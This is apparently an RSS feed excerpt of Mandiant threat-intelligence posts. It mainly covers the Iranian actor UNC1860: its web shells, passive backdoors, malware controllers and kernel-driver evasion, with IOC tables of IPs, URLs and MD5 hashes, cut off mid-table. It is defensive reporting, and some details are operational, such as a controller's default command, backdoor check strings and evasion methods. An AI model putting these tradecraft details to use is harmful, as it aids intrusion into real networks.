baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">74.63.233.50</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">46475</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Limestone Networks</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">AstrillVPN</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">98.179.96.75</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">22773</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Cox Communications</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div></div> <div class="block-paragraph_advanced"><h2>URLs</h2></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1px" cellpadding="16px" style="border-collapse: collapse; margin-left: auto; margin-right: auto;"><colgroup><col/></colgroup> <tbody> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong><span style="vertical-align: baseline;">URL</span></strong></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">hxxps://daniel-ayala[.]netlify[.]app</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div></div></description><pubDate>Mon, 23 Sep 2024 12:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/topics/threat-intelligence/mitigating-dprk-it-worker-threat/</guid><category>Threat Intelligence</category><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>Staying a Step Ahead: Mitigating the DPRK IT Worker Threat</title><description></description><site_name>Google</site_name><url>https://cloud.google.com/blog/topics/threat-intelligence/mitigating-dprk-it-worker-threat/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Mandiant </name><title></title><department></department><company></company></author></item><item><title>UNC1860 and the Temple of Oats: Iran’s Hidden Hand in Middle Eastern Networks</title><link>https://cloud.google.com/blog/topics/threat-intelligence/unc1860-iran-middle-eastern-networks/</link><description><div class="block-paragraph_advanced"><p>Written by: <span style="vertical-align: baseline;">Stav Shulman, Matan Mimran, Sarah Bock, Mark Lechtik</span></p> <hr/></div> <div class="block-paragraph_advanced"><h2><span style="vertical-align: baseline;">Executive Summary</span></h2> <p><span style="vertical-align: baseline;">UNC1860 is a persistent and opportunistic Iranian state-sponsored threat actor that is likely affiliated with Iran’s Ministry of Intelligence and Security (MOIS). A key feature of UNC1860 is its collection of specialized tooling and passive backdoors that Mandiant believes supports several objectives, including its role as a probable initial access provider and its ability to gain persistent access to high-priority networks, such as those in the government and telecommunications space throughout the Middle East.</span></p> <p><span style="vertical-align: baseline;">UNC1860’s tradecraft and targeting parallels with </span><a href="https://blog.talosintelligence.com/introducing-shrouded-snooper/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Shrouded Snooper</span></a><span style="vertical-align: baseline;">, </span><a href="https://research.checkpoint.com/2023/from-albania-to-the-middle-east-the-scarred-manticore-is-listening/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Scarred Manticore</span></a><span style="vertical-align: baseline;">, and </span><a href="https://www.microsoft.com/en-us/security/blog/2022/09/08/microsoft-investigates-iranian-attacks-against-the-albanian-government/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Storm</span></a><span style="vertical-align: baseline;">-</span><a href="https://www.microsoft.com/en-us/security/security-insider/intelligence-reports/iran-surges-cyber-enabled-influence-operations-in-support-of-hamas" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">0861</span></a><span style="vertical-align: baseline;">, Iran-based threat actors publicly reported to have targeted the telecommunications and government sectors in the Middle East. These groups have also reportedly </span><a href="https://research.checkpoint.com/2024/bad-karma-no-justice-void-manticore-destructive-activities-in-israel/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">provided initial access</span></a><span style="vertical-align: baseline;"> for destructive and disruptive operations that targeted Israel in late October 2023 with BABYWIPER and Albania in 2022 using </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/likely-iranian-threat-actor-conducts-politically-motivated-disruptive-activity-against?e=48754805"><span style="text-decoration: underline; vertical-align: baseline;">ROADSWEEP</span></a><span style="vertical-align: baseline;">. Mandiant cannot independently corroborate that UNC1860 was involved in providing initial access for these operations. However, we identified specialized UNC1860 tooling including GUI-operated malware controllers, which are likely designed to facilitate hand-off operations, further supporting the initial access role played by UNC1860.</span></p> <p><span style="vertical-align: baseline;">UNC1860 additionally maintains an arsenal of utilities and collection of “main-stage” passive backdoors designed to gain strong footholds into victim networks and establish persistent, long-term access. Among these main-stage backdoors includes a Windows kernel mode driver repurposed from a legitimate Iranian anti-virus software filter driver, reflecting the group’s reverse engineering capabilities of Windows kernel components and detection evasion capabilities. These capabilities demonstrate that UNC1860 is a formidable threat actor that likely supports various objectives ranging from espionage to network attack operations. As tensions continue to ebb and flow in the Middle East, we believe this actor’s adeptness in gaining initial access to target environments represents a valuable asset for the Iranian cyber ecosystem that can be exploited to answer evolving objectives as needs shift. </span></p> <h2><span style="vertical-align: baseline;">Teamwork Makes the Dream Work: UNC1860’s Role as an Initial Access Provider </span></h2> <p><span style="vertical-align: baseline;">Mandiant identified two custom, GUI-operated malware controllers tracked as TEMPLEPLAY and VIROGREEN that we assess were used to provide a team outside of UNC1860 remote access to victim networks. This tooling, coupled with </span><a href="https://research.checkpoint.com/2024/bad-karma-no-justice-void-manticore-destructive-activities-in-israel/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">public reporting</span></a><span style="vertical-align: baseline;"> and evidence suggesting that the group collaborates with MOIS-affiliated groups such as APT34, strengthens the assessment that UNC1860 acts as an initial access agent.</span></p> <h3><span style="vertical-align: baseline;">Using Sustained Access to Support Initial Access Operations</span></h3> <p><span style="vertical-align: baseline;">In 2020, Mandiant responded to an engagement in which UNC1860 used the victim’s network as a staging area to conduct additional scanning and exploitation operations against unrelated entities. The actor was observed scanning IP addresses predominantly located in Saudi Arabia in an attempt to identify exposed vulnerabilities. UNC1860 also used a command-line tool to validate credentials of accounts and email addresses across multiple domains belonging to Qatari and Saudi Arabian entities, and later targeted VPN servers of entities in the region. </span></p> <h3><span style="vertical-align: baseline;">UNC1860 Overlaps with APT34 </span></h3> <p><span style="vertical-align: baseline;">Mandiant responded to several engagements in 2019 and 2020 in which organizations compromised by suspected APT34 actors were previously compromised by UNC1860. Similarly, organizations previously compromised by suspected APT34 actors were later compromised by UNC1860, suggesting the group may play a role in assisting with lateral movement. Mandiant additionally identified recent indications of operational pivoting to Iraq-based targets by both APT34-related clusters and UNC1860. </span></p> <h3><span style="vertical-align: baseline;">Web Shell and Droppers </span></h3> <p><span style="vertical-align: baseline;">UNC1860 web shells and droppers, such as STAYSHANTE and SASHEYAWAY, deployed and placed on compromised servers by the group after gaining initial access have the potential to be used in hand-off operations based on their functionality. In March 2024, the </span><a href="https://www.gov.il/he/pages/alert_1721" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Israeli National Cyber Directorate was alerted</span></a><span style="vertical-align: baseline;"> to wiper activity targeting Israeli entities across various sectors in Israel, including managed service providers, local governments, and academia; technical indicators included the unique STAYSHANTE web shell and the SASHEYAWAY dropper we attribute to UNC1860.</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">STAYSHANTE is typically installed using names masquerading as Windows server file names or dependencies, and is controlled by the VIROGREEN custom framework described as follows.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">SASHEYAWAY has a low detection rate that allows for the smooth execution of full passive backdoors, such as TEMPLEDOOR, FACEFACE, and SPARKLOAD, embedded within it. </span></p> </li> </ul> <h3><span style="vertical-align: baseline;">Custom, GUI-Operated Malware Controllers</span></h3> <p><span style="vertical-align: baseline;">UNC1860 GUI-operated malware controllers TEMPLEPLAY and VIROGREEN could provide third-party actors who have no previous knowledge of the target environment the ability to remotely access infected networks via RDP and to control previously installed malware on victim networks with ease. These controllers additionally could provide third-party operators an interface that walks operators through how to deploy custom payloads and perform other operations such as conducting internal scanning and exploitation within the target network.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/unc1860-temple-of-oats-fig1.max-1000x1000.png" alt="Illustration of collaborator actor&#x27;s C2 used to utilize existing UNC1860 implant infrastructure in compromised network"> </a> <figcaption class="article-image__caption "><p data-block-key="7kc6d">Figure 1: Illustration of collaborator actor's command and control (C2 or C&amp;C) used to utilize existing UNC1860 implant infrastructure in compromised network</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">TEMPLEPLAY Controller</span></h4> <p><span style="vertical-align: baseline;">TEMPLEPLAY (MD5: </span><code style="vertical-align: baseline;">c517519097bff386dc1784d98ad93f9d</code><span style="vertical-align: baseline;">) is a .NET-based controller for the TEMPLEDOOR passive backdoor. It is internally named Client Http and consists of several tabs, each one facilitating control of a separate backdoor command.</span></p> <p><span style="vertical-align: baseline;">The Command Prompt Tab (Figure 2) s</span><span style="vertical-align: baseline;">ends a command line to execute on the target host. The default command is cmd /c 2 &gt; &amp;1 with parameter whoami.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/unc1860-temple-of-oats-fig2.max-1000x1000.png" alt="TEMPLEPLAY GUI, Command Prompt Tab"> </a> <figcaption class="article-image__caption "><p data-block-key="7kc6d">Figure 2: TEMPLEPLAY GUI, Command Prompt Tab</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">The Upload File Tab (Figure 3) s</span><span style="vertical-align: baseline;">ends a file from a local path to a target path on the remote machine using a POST request. The default target path is </span><code style="vertical-align: baseline;">C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\15\TEMPLATE\LAYOUTS</code><span style="vertical-align: baseline;">.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/unc1860-temple-of-oats-fig3.max-1000x1000.png" alt="Upload File Tab"> </a> <figcaption class="article-image__caption "><p data-block-key="ea8sq">Figure 3: Upload File Tab</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">The Download File Tab (Figure 4) is used to obtain a file from a given path on the infected machine. The default path on the infected machine is C:\Programdata\1.txt.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/unc1860-temple-of-oats-fig4.max-1000x1000.png" alt="Download File Tab"> </a> <figcaption class="article-image__caption "><p data-block-key="ea8sq">Figure 4: Download File Tab</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">The Http Proxy Tab (Figure 5) a</span><span style="vertical-align: baseline;">llows a remote machine infected with TEMPLEDOOR to be used as a middlebox that forwards data to a chosen target server. It appears that it is primarily intended to facilitate an RDP connection with the target server, most likely in cases where the latter is not accessible directly over the internet due to network boundaries (such as a NAT or a firewall), but may be accessible via the TEMPLEDOOR infected machine.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/unc1860-temple-of-oats-fig5.max-1000x1000.png" alt="HTTP Proxy Tab"> </a> <figcaption class="article-image__caption "><p data-block-key="4dsz5">Figure 5: HTTP Proxy Tab</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">The URLs Tab (Figure 6) includes </span><span style="vertical-align: baseline;">URL endpoints that are used when connecting to the infected machine. An endpoint string is chosen at random from the lists defined in this tab. These endpoints correspond to the ones that are defined in the TEMPLEDOOR sample (</span><code style="vertical-align: baseline;">MD5:</code><code style="vertical-align: baseline;">c57e59314aee7422e626520e495effe0</code>).</p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/unc1860-temple-of-oats-fig6.max-1000x1000.png" alt="URLs Tab"> </a> <figcaption class="article-image__caption "><p data-block-key="4dsz5">Figure 6: URLs Tab</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">The TEMPLEPLAY GUI also includes a Test Backdoor link, which c</span><span style="vertical-align: baseline;">reates a GET request with the string </span><code style="vertical-align: baseline;">wOxhuoSBgpGcnLQZxipa</code><span style="vertical-align: baseline;"> as the relative URI and checks for the string </span><code style="vertical-align: baseline;">UsEPTIkCRUwarKZfRnyjcG13DFA</code><span style="vertical-align: baseline;"> in the response. This corresponds to an echo \ ping mechanism that was seen in use in the TEMPLEDOOR samples (</span><code style="vertical-align: baseline;">MD5:b219672bcd60ce9a81b900217b3b5864</code><span style="vertical-align: baseline;">)and </span><code style="vertical-align: baseline;">MD5:c57e59314aee7422e626520e495effe0</code><span style="vertical-align: baseline;">).</span></p> <p><span style="vertical-align: baseline;">Additional links include the Explore link that </span><span style="vertical-align: baseline;">opens a new Explorer window in the host where the controller runs, and the </span><span style="vertical-align: baseline;">Http Setting link points to a s</span><span style="vertical-align: baseline;">et of configuration parameters that pertain to the HTTP requests sent between the controller and the TEMPLEDOOR passive backdoor.</span></p> <h4><span style="vertical-align: baseline;">VIROGREEN Controller</span></h4> <p><span style="vertical-align: baseline;">VIROGREEN is a custom framework used to exploit vulnerable SharePoint servers with CVE-2019-0604 (Figure 7). The framework provides post-exploitation capabilities including scanning for and exploiting CVE-2019-0604; controlling post-exploitation payloads, backdoors (including the STAYSHANTE web shell and the BASEWALK backdoor) and tasking; controlling a compatible agent regardless of how the agent has been implanted; and executing commands and uploading/downloading files.</span></p> <p><span style="vertical-align: baseline;">Additional details on TEMPLEPLAY and VIROGREEN can be found in the <a href="https://services.google.com/fh/files/misc/unc1860-technical-annex.pdf" rel="noopener" target="_blank">Technical Annex</a>.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/unc1860-temple-of-oats-fig7.max-1000x1000.png" alt="VIROGREEN GUI"> </a> <figcaption class="article-image__caption "><p data-block-key="00fds">Figure 7: VIROGREEN GUI</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h2><span style="vertical-align: baseline;">UNC1860 Malware: Gaining Persistent Access </span></h2> <p><span style="vertical-align: baseline;">UNC1860 gains initial access to victim environments in an opportunistic manner via the exploitation of vulnerable internet-facing servers leading to web shell deployment. After obtaining an initial foothold, the group typically deploys additional utilities and a selective suite of passive implants that are designed to be stealthier than common backdoors. These provide a higher degree of operational security by removing the dependency for classic C2 infrastructure, making detection more difficult for network defenders. </span><a href="https://blog.talosintelligence.com/introducing-shrouded-snooper/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Cisco</span></a><span style="vertical-align: baseline;"> and </span><a href="https://research.checkpoint.com/2023/from-albania-to-the-middle-east-the-scarred-manticore-is-listening/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Check Point</span></a><span style="vertical-align: baseline;"> have provided extensive analysis on UNC1860’s passive implants that correspond to OATBOAT, a loader that loads and executes shellcode payloads; </span><a href="https://www.fortinet.com/blog/threat-research/wintapix-kernal-driver-middle-east-countries" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Fortinet</span></a><span style="vertical-align: baseline;"> additionally provided analysis regarding the Windows kernel driver, WINTAPIX, which has similar code to a malicious driver we track as TOFUDRV (Figure 8 and Figure 9). </span></p> <p><span style="vertical-align: baseline;">A key feature of UNC1860 includes its maintenance of this diverse collection of passive/listener-based utilities that support the group’s initial access and lateral movement goals. We believe the group additionally maintains a smaller collection of “main-stage” backdoors that have greater capabilities than the usual web shells and small .NET utilities that may be deployed for select high-priority victims in the telecommunications sector. These implants demonstrate the group’s keen understanding of the Windows operating system (OS) and network detection solutions, reverse engineering capabilities of Windows kernel components, and detection evasion capabilities. </span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Passive implants do not initiate outbound traffic from the victim network to a C2 server. Further, the inbound traffic containing commands or payloads can arrive from any volatile source (e.g., VPN nodes within the target country, from another victim, or even internally from another part of the victim network). This makes network monitoring more difficult. Web shells and passive implants leverage HTTPS-encrypted traffic so commands/payloads cannot be extracted from captured network traffic.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Both passive implants TOFUDRV and TOFULOAD leverage undocumented Input/Output Control commands for communication, which requires knowledge of the OS and can lower the chances of this traffic being detected by endpoint detection and response (EDR) solutions.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Loading drivers is a "high risk / high reward" situation as loading them without creating a critical error screen requires extensive knowledge both of the OS internals and victim environments; however, using them promises lower detection rates and possibilities akin to filtering drivers, which act as middlemen allowing for the inspection, modification, or blocking of network traffic before it reaches the device or application, as well as assets like file system objects and registry entries. </span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">The passive backdoor TEMPLEDROP repurposed an Iranian AV software Windows file system filter driver named Sheed AV (MD5: 0c93cac9854831da5f761ee98bb40c37) for the purpose of protecting some of the files it deploys as well as its own file from modification.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">A .NET-based utility for defense evasion tracked as TEMPLELOCK was observed being implemented in both foothold utilities such as ROTPIPE and more complex passive implants such as TEMPLEDROP. TEMPLELOCK is capable of terminating threats associated with the Windows Event Log service and restarting the service’s operation on demand.</span></p> </li> </ul></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/unc1860-temple-of-oats-fig8.max-1000x1000.png" alt="Driver file protection logic in WINTAPIX (MD5: 286bd9c2670215d3cb4790aac4552f22)"> </a> <figcaption class="article-image__caption "><p data-block-key="00fds">Figure 8: Driver file protection logic in WINTAPIX (MD5: 286bd9c2670215d3cb4790aac4552f22)</p></figcaption> </figure> </div> </div> </div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/unc1860-temple-of-oats-fig9.max-1000x1000.png" alt="Driver file protection logic in TOFUDRV (MD5: b4b1e285b9f666ae7304a456da01545e)"> </a> <figcaption class="article-image__caption "><p data-block-key="00fds">Figure 9: Driver file protection logic in TOFUDRV (MD5: b4b1e285b9f666ae7304a456da01545e)</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">UNC1860 Unique Artifacts Suggest Consistent Development Support</span></h3> <p><span style="vertical-align: baseline;">In addition to the previous observations, we identified the following recurring artifacts related to the group’s independent implementation of Base64 encoding/decoding and XOR encryption/decryption in .NET code, despite these functions being available in build-in .NET code. </span></p> <p><span style="vertical-align: baseline;">The intent of the independent implementation of these functions is not entirely clear. Nevertheless, it is highly likely that using such custom libraries bypasses common detections by EDRs and other security tools—detections designed to identify usage combinations of functions commonly seen in malware. Additionally, using these custom libraries may allow better compatibility if any of the built-in functions change in a specific version of a .NET control to ensure the group’s tooling is always compatible with its encryption and encoding schemes and/or to better help evade detection.</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">We observed the same encoding method using the Base64 algorithm to encode and decode data sent between controllers and proxy servers. In several cases, we identified the reuse of a seemingly misspelled Base64 DLL using the name “bsae64” in both foothold utilities deployed via SASHEYAWAY and passive implants including TEMPLEDOOR. </span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">We observed the same rolling encryption module, XORO (MD5: </span><code style="vertical-align: baseline;">57cd8e220465aa8030755d4009d0117c),</code><span style="vertical-align: baseline;">dropped by the TANKSHELL utility; TUNNELBOI network tunneller capable of establishing a connection with a remote host, managing web shells on the network, and creating RDP connections; and the TEMPLEPLAY controller. </span></p> </li> </ul> <h3><span style="vertical-align: baseline;">Foothold Utilities and Backdoors and Malware Use for Longer Term Persistence</span></h3> <p><span style="vertical-align: baseline;">Mandiant is tracking multiple foothold utilities and backdoors used in UNC1860 initial access operations. These generally use custom obfuscation methods that can lower detection rates and make analysis more difficult by renaming strings and function names. Additionally, we are tracking numerous code families that we consider to be UNC1860 “main-stage” implants that further increase the group’s persistence in victim environments. </span></p> <p><span style="vertical-align: baseline;">Please see the <a href="https://services.google.com/fh/files/misc/unc1860-technical-annex.pdf" rel="noopener" target="_blank">Technical Annex</a> for more information. </span></p> <h2><span style="vertical-align: baseline;">Additional Protection Information for Google Cloud Customers</span></h2> <p><span style="vertical-align: baseline;">For Google SecOps Enterprise+ customers, SecOps rules have been released to the </span><a href="https://cloud.google.com/chronicle/docs/preview/curated-detections/windows-threats-category"><span style="text-decoration: underline; vertical-align: baseline;">Emerging Threats</span></a><span style="vertical-align: baseline;"> rule pack, and IOCs listed in this blog post are available for prioritization with </span><a href="https://cloud.google.com/chronicle/docs/detection"><span style="text-decoration: underline; vertical-align: baseline;">Applied Threat Intelligence</span></a><span style="vertical-align: baseline;">.</span></p> <h2><span style="vertical-align: baseline;">Indicators of Compromise (IOCs)</span></h2> <p><span style="vertical-align: baseline;">A Google Threat Intelligence Collection featuring <a href="https://www.virustotal.com/gui/collection/bf73231856c4c981eb42fb4bd9cad60fddc444e1ec7375c4d3ad46bf18f4db41" rel="noopener" target="_blank">IOCs related to the activity described in this post</a> is now available for registered users.</span></p> <h3><span style="vertical-align: baseline;">MD5 Hashes</span></h3></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1px" cellpadding="16px" style="border-collapse: collapse; margin-left: auto; margin-right: auto;"><colgroup><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">1176381da7dea356f3377a59a6f0e799</code></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">41f4732ed369f2224a422752860b0bc5</code></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">4029bc4a06638bb9ac4b8528523b72f6</code></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">126bc1c30fba27f8bf67dce4892b1e8c</code></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">0c9ff0db00f04fd4c6a9160bffd85a1d</code></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">a7693e399602eb79db537c5022dd1e01</code></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">d9719f6738dbfaa21be7f184512fe074</code></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">17b27e6aa0ab6501f11bb4d2e0f829ff</code></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">4dd6250eb2d368f500949952eb013964</code></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">69fd67c115349abb4a313230a1692642</code></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">7f5f5f290910d256e6b012f898c88bf3</code></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">c90ec587e3333dabb647ebc182673460</code></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">efe8043e1b4214640c5f7b5ddf737653</code></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">a90236e4962620949b720f647a91f101</code></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">b26d54b7da7b2bf600104f69da4ea00f</code></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">d87ca3f830b8b53fde358bb64900f6af</code></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">c50ae2c4b76f0d5724ec240568c78c4f</code></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">57cd8e220465aa8030755d4009d0117c</code></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">4b2c78bb2c439998cff0cc097a14b942</code></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code 